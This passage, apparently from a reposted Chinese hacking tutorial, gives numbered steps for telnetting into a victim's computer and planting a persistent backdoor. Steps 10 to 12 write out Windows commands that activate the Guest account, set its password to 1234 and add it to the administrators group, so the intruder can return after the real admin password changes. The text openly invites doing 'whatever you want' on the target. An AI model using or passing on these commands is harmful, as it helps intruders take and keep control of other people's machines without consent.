9.Telnet127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧，哈哈)为了以防万一，我们再把guest激活加到管理组

10.C:>netuserguest/active:yes

将对方的Guest用户激活

11.C:>netuserguest1234

将Guest的密码改为1234，或者你要设定的密码

12.C:>netlocalgroupadministratorsguest/add

将Guest变为Administrator^_^(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机)。



更多完整内容阅读登陆

《墨缘文学网，https://wap.mywenxue.org》